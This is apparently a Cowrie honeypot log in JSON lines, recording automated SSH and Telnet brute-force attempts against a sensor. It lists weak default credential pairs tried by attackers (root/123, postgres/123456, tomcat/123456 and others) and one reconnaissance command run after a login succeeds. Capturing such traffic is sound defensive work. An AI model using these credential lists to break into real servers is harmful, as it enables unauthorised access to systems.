{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.828667Z","src_ip":"212.227.125.160","session":"a11180d6dd41"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:01:15.857471Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:01:16.168173Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:01:16.169019Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:16.171314Z","src_ip":"212.227.125.160","session":"a11180d6dd41"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:16.284794Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:16.285971Z","src_ip":"212.227.125.160","session":"1d36a3c994e2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:17.277414Z","src_ip":"212.227.125.160","session":"a11180d6dd41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49592,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd9f393f01e4","protocol":"ssh","message":"New connection: 212.227.235.229:49592 (1.2.3.4:22) [session: dd9f393f01e4]","sensor":"my-vps","timestamp":"2025-08-28T06:01:25.011075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:25.011784Z","src_ip":"212.227.235.229","session":"dd9f393f01e4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:25.157015Z","src_ip":"212.227.235.229","session":"dd9f393f01e4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:25.594639Z","src_ip":"212.227.235.229","session":"dd9f393f01e4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:26.742954Z","src_ip":"212.227.235.229","session":"dd9f393f01e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59714,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a11cc1e92c4","protocol":"ssh","message":"New connection: 212.227.125.160:59714 (1.2.3.4:22) [session: 2a11cc1e92c4]","sensor":"my-vps","timestamp":"2025-08-28T06:01:32.559070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:32.586489Z","src_ip":"212.227.125.160","session":"2a11cc1e92c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:32.696723Z","src_ip":"212.227.125.160","session":"2a11cc1e92c4"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:33.087224Z","src_ip":"212.227.125.160","session":"2a11cc1e92c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":5170,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c8a5d8e395","protocol":"ssh","message":"New connection: 212.227.235.229:5170 (1.2.3.4:22) [session: c0c8a5d8e395]","sensor":"my-vps","timestamp":"2025-08-28T06:01:33.351876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:01:33.352534Z","src_ip":"212.227.235.229","session":"c0c8a5d8e395"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:01:33.492374Z","src_ip":"212.227.235.229","session":"c0c8a5d8e395"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:34.112202Z","src_ip":"212.227.235.229","session":"c0c8a5d8e395"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:34.194019Z","src_ip":"212.227.125.160","session":"2a11cc1e92c4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:35.248932Z","src_ip":"212.227.235.229","session":"c0c8a5d8e395"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57576,"dst_ip":"1.2.3.4","dst_port":22,"session":"e80ab22d2c0d","protocol":"ssh","message":"New connection: 212.227.235.229:57576 (1.2.3.4:22) [session: e80ab22d2c0d]","sensor":"my-vps","timestamp":"2025-08-28T06:01:36.801810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:36.845584Z","src_ip":"212.227.235.229","session":"e80ab22d2c0d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:37.064120Z","src_ip":"212.227.235.229","session":"e80ab22d2c0d"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:37.841710Z","src_ip":"212.227.235.229","session":"e80ab22d2c0d"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:38.989907Z","src_ip":"212.227.235.229","session":"e80ab22d2c0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46334,"dst_ip":"1.2.3.4","dst_port":23,"session":"5706b2a319ab","protocol":"telnet","message":"New connection: 212.227.125.160:46334 (1.2.3.4:23) [session: 5706b2a319ab]","sensor":"my-vps","timestamp":"2025-08-28T06:01:39.487489Z"}
{"eventid":"cowrie.session.closed","duration":12.987099409103394,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:52.474525Z","src_ip":"212.227.125.160","session":"5706b2a319ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49504,"dst_ip":"1.2.3.4","dst_port":22,"session":"19b076a3d676","protocol":"ssh","message":"New connection: 212.227.235.229:49504 (1.2.3.4:22) [session: 19b076a3d676]","sensor":"my-vps","timestamp":"2025-08-28T06:01:52.591537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:01:52.592501Z","src_ip":"212.227.235.229","session":"19b076a3d676"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:01:52.737143Z","src_ip":"212.227.235.229","session":"19b076a3d676"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:01:53.168738Z","src_ip":"212.227.235.229","session":"19b076a3d676"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:01:54.317508Z","src_ip":"212.227.235.229","session":"19b076a3d676"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":34920,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d7ec46c82f9","protocol":"telnet","message":"New connection: 8.222.212.69:34920 (1.2.3.4:23) [session: 0d7ec46c82f9]","sensor":"my-vps","timestamp":"2025-08-28T06:01:55.207479Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59308,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4c16e005fed","protocol":"ssh","message":"New connection: 212.227.125.160:59308 (1.2.3.4:22) [session: d4c16e005fed]","sensor":"my-vps","timestamp":"2025-08-28T06:02:02.159144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:02.162898Z","src_ip":"212.227.125.160","session":"d4c16e005fed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:02.268170Z","src_ip":"212.227.125.160","session":"d4c16e005fed"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:02.832734Z","src_ip":"212.227.125.160","session":"d4c16e005fed"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:03.940409Z","src_ip":"212.227.125.160","session":"d4c16e005fed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47510,"dst_ip":"1.2.3.4","dst_port":22,"session":"c325417c9a17","protocol":"ssh","message":"New connection: 212.227.235.229:47510 (1.2.3.4:22) [session: c325417c9a17]","sensor":"my-vps","timestamp":"2025-08-28T06:02:06.514261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:06.515313Z","src_ip":"212.227.235.229","session":"c325417c9a17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:06.659308Z","src_ip":"212.227.235.229","session":"c325417c9a17"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456","message":"login attempt [tomcat/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:07.096021Z","src_ip":"212.227.235.229","session":"c325417c9a17"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:08.242743Z","src_ip":"212.227.235.229","session":"c325417c9a17"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53028,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed13ce9d8be4","protocol":"ssh","message":"New connection: 217.72.205.35:53028 (1.2.3.4:22) [session: ed13ce9d8be4]","sensor":"my-vps","timestamp":"2025-08-28T06:02:13.624313Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:13.625394Z","src_ip":"217.72.205.35","session":"ed13ce9d8be4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47342,"dst_ip":"1.2.3.4","dst_port":22,"session":"673fd327083b","protocol":"ssh","message":"New connection: 212.227.125.160:47342 (1.2.3.4:22) [session: 673fd327083b]","sensor":"my-vps","timestamp":"2025-08-28T06:02:15.119361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:15.120234Z","src_ip":"212.227.125.160","session":"673fd327083b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:15.259720Z","src_ip":"212.227.125.160","session":"673fd327083b"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:15.604284Z","src_ip":"212.227.125.160","session":"673fd327083b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:16.733032Z","src_ip":"212.227.125.160","session":"673fd327083b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":51496,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8900f18f0b5","protocol":"telnet","message":"New connection: 8.222.212.69:51496 (1.2.3.4:23) [session: a8900f18f0b5]","sensor":"my-vps","timestamp":"2025-08-28T06:02:19.949649Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58418,"dst_ip":"1.2.3.4","dst_port":22,"session":"60a84b2f38f6","protocol":"ssh","message":"New connection: 212.227.235.229:58418 (1.2.3.4:22) [session: 60a84b2f38f6]","sensor":"my-vps","timestamp":"2025-08-28T06:02:21.301364Z"}
